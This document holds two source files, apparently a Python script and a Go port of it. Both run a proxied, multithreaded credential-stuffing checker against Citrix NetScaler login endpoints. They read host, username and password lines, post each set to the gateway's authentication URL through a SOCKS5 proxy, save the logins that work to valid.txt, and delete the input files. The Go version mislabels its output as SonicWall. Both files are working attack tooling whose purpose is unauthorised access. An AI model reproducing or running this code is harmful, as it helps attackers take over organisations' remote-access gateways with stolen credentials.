File: sers3.py
import os
import asyncio
import aiohttp
from aiohttp_socks import ProxyType, ProxyConnector
import aiofiles

async def check_proxy(session, test_url='https://httpbin.org/ip'):
    try:
        async with session.get(test_url, timeout=10) as response:
            if response.status == 200:
                print("[Citrix] Proxy is valid.")
                return True
            else:
                print(f"[Citrix] Proxy returned status {response.status}.")
                return False
    except Exception as e:
        print(f"[Citrix] Proxy check failed: {e}")
        return False

async def valid_wrapper(line, valid_file_path):
    async with aiofiles.open(valid_file_path, 'a') as valid_file:
        await valid_file.write(f'{line}\n')

async def check_host(semaphore, session, ip, data, line, valid_file_path):
    url = f'https://{ip}/p/u/doAuthentication.do'
    async with semaphore:
        try:
            async with session.post(url, data=data, ssl=False, timeout=10) as resp:
                if '<CredentialUpdateService>/p/a/getCredentialUpdateRequirements.do</CredentialUpdateService>' in await resp.text():
                    print(f'[Citrix] {line} is valid')
                    await valid_wrapper(line, valid_file_path)
                else:
                    print(f'[Citrix] {line} is invalid')
        except Exception as e:
            print(f'[Citrix] Error checking {line}: {e}')

async def process_file(semaphore, proxy_info, file_path, valid_file_path):
    host, port, username, password = proxy_info.split(':')
    connector = ProxyConnector(proxy_type=ProxyType.SOCKS5, host=host, port=int(port), username=username, password=password)
    async with aiohttp.ClientSession(connector=connector) as session:
        if not await check_proxy(session):
            print("[Citrix] Skipping file processing due to proxy check failure.")
            return
        with open(file_path, "r") as file:
            lines = file.readlines()
        tasks = [check_host(semaphore, session, line.split(";")[0], {"login": line.split(";")[1], "passwd": line.split(";")[2].strip(), "savecredentials": "false", "nsg-x1-logon-button": "Log On", "StateContext": "bG9naW5zY2hlbWE9ZGVmYXVsdA%3D%3D"}, line, valid_file_path) for line in lines]
        await asyncio.gather(*tasks)
        os.remove(file_path)  # Удаление файла после обработки
        print(f"[Citrix] File {file_path} has been processed and removed.")

async def main():
    with open("config.txt", "r") as config_file:
        for line in config_file:
            if line.startswith("threads"):
                threads = int(line.split("=")[1].strip())
                break
    print(f"[Citrix] Using {threads} threads.")  # Вывод количества потоков

    filedirk = "/root/NAM/Check"
    validdir = "/root/NAM/Servis"

    semaphore = asyncio.Semaphore(threads)  # Ограничение количества одновременных задач
    os.makedirs(filedirk, exist_ok=True)
    os.makedirs(validdir, exist_ok=True)
    valid_file_path = os.path.join(validdir, 'valid.txt')
    proxy_config_path = os.path.join(validdir, 'proxy_config.txt')
    
    with open(proxy_config_path, "r") as proxy_file:
        proxy_info = proxy_file.readline().strip()

    files = [os.path.join(filedirk, f) for f in os.listdir(filedirk) if f.endswith(".txt")]
    for file_path in files:
        await process_file(semaphore, proxy_info, file_path, valid_file_path)

if __name__ == "__main__":
    asyncio.run(main())

File: sers3.go
//go:build ignore

package main

import (
	"bufio"
	"context"
	"fmt"
	"io"
	"net"
	"net/http"
	"os"
	"path/filepath"
	"strings"
	"sync"
	"time"

	"golang.org/x/net/proxy"
)

var (
	fileDir     = "/root/NAM/Check"
	validDir    = "/root/NAM/Servis"
	validFile   = filepath.Join(validDir, "valid.txt")
	proxyConfig = filepath.Join(validDir, "proxy_config.txt")
)

type config struct {
	Threads int
}

func readConfig(path string) config {
	cfg := config{Threads: 100}
	f, err := os.Open(path)
	if err != nil {
		return cfg
	}
	defer f.Close()
	scanner := bufio.NewScanner(f)
	for scanner.Scan() {
		line := strings.TrimSpace(scanner.Text())
		if strings.HasPrefix(line, "threads") {
			fmt.Sscanf(line, "threads=%d", &cfg.Threads)
		}
	}
	return cfg
}

func readProxy(path string) string {
	data, err := os.ReadFile(path)
	if err != nil {
		return ""
	}
	return strings.TrimSpace(string(data))
}

func checkProxy(client *http.Client) bool {
	resp, err := client.Get("https://httpbin.org/ip")
	if err != nil {
		return false
	}
	resp.Body.Close()
	return resp.StatusCode == 200
}

func appendValid(line string) {
	f, err := os.OpenFile(validFile, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0600)
	if err == nil {
		defer f.Close()
		io.WriteString(f, line+"\n")
	}
}

func worker(client *http.Client, jobs <-chan string, wg *sync.WaitGroup) {
	defer wg.Done()
	for line := range jobs {
		parts := strings.Split(line, ";")
		if len(parts) < 3 {
			continue
		}
		url := fmt.Sprintf("https://%s/p/u/doAuthentication.do", strings.TrimSpace(parts[0]))
		form := "login=" + parts[1] + "&passwd=" + strings.TrimSpace(parts[2]) + "&savecredentials=false&nsg-x1-logon-button=Log On&StateContext=bG9naW5zY2hlbWE9ZGVmYXVsdA%3D%3D"
		req, _ := http.NewRequest("POST", url, strings.NewReader(form))
		req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
		resp, err := client.Do(req)
		if err == nil {
			body, _ := io.ReadAll(resp.Body)
			resp.Body.Close()
			if strings.Contains(string(body), "<CredentialUpdateService>/p/a/getCredentialUpdateRequirements.do</CredentialUpdateService>") {
				fmt.Printf("[SonicWall] %s is valid\n", line)
				appendValid(line)
			} else {
				fmt.Printf("[SonicWall] %s is invalid\n", line)
			}
		} else {
			fmt.Printf("[SonicWall] error for %s: %v\n", line, err)
		}
	}
}

func main() {
	cfg := readConfig("config.txt")
	fmt.Printf("[SonicWall] Using %d threads.\n", cfg.Threads)

	os.MkdirAll(fileDir, os.ModePerm)
	os.MkdirAll(validDir, os.ModePerm)

	proxyInfo := readProxy(proxyConfig)
	parts := strings.Split(proxyInfo, ":")
	if len(parts) != 4 {
		fmt.Println("[SonicWall] invalid proxy config")
		return
	}
	dialerAuth := &proxy.Auth{User: parts[2], Password: parts[3]}
	dialer, err := proxy.SOCKS5("tcp", parts[0]+":"+parts[1], dialerAuth, proxy.Direct)
	if err != nil {
		fmt.Printf("proxy dialer error: %v\n", err)
		return
	}

	httpTransport := &http.Transport{}
	httpTransport.DialContext = func(ctx context.Context, network, addr string) (net.Conn, error) {
		return dialer.Dial(network, addr)
	}

	client := &http.Client{Transport: httpTransport, Timeout: 10 * time.Second}
	if !checkProxy(client) {
		fmt.Println("[SonicWall] proxy check failed")
		return
	}

	files, _ := filepath.Glob(filepath.Join(fileDir, "*.txt"))
	jobs := make(chan string, cfg.Threads)
	var wg sync.WaitGroup
	for i := 0; i < cfg.Threads; i++ {
		wg.Add(1)
		go worker(client, jobs, &wg)
	}

	for _, fp := range files {
		f, err := os.Open(fp)
		if err != nil {
			continue
		}
		scanner := bufio.NewScanner(f)
		for scanner.Scan() {
			line := strings.TrimSpace(scanner.Text())
			if line == "" {
				continue
			}
			jobs <- line
		}
		f.Close()
		os.Remove(fp)
		fmt.Printf("[SonicWall] File %s processed\n", fp)
	}

	close(jobs)
	wg.Wait()
}
